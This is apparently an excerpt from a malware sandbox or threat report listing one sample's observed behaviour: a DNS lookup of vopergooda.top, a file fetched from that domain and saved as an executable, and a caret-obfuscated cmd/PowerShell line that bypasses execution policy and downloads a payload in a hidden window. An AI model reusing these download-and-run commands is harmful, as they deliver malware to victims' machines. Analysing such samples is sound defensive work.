Technical Information
- http://www.vopergooda.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oW^ER^S^heL^l.EXE^ -EXEcU^TioNPo^Licy BYpA^Ss -no^PROF^i^l^E -wIN^d^OWS^tYlE^ hiddeN^ (n^Ew^-oB^je^Ct sYstEM.neT.^wEbc^L^IENT^).^d^O^w^nL^OA^df^iLE^(^'http://www.vopergooda.to...
- DNS ASK vo###gooda.top
- '<SYSTEM32>\cmd.exe' /c "p^oW^ER^S^heL^l.EXE^ -EXEcU^TioNPo^Licy BYpA^Ss -no^PROF^i^l^E -wIN^d^OWS^tYlE^ hiddeN^ (n^Ew^-oB^je^Ct sYstEM.neT.^wEbc^L^IENT^).^d^O^w^nL^OA^df^iLE^(^'http://www.vopergooda.to...' (with hidden window)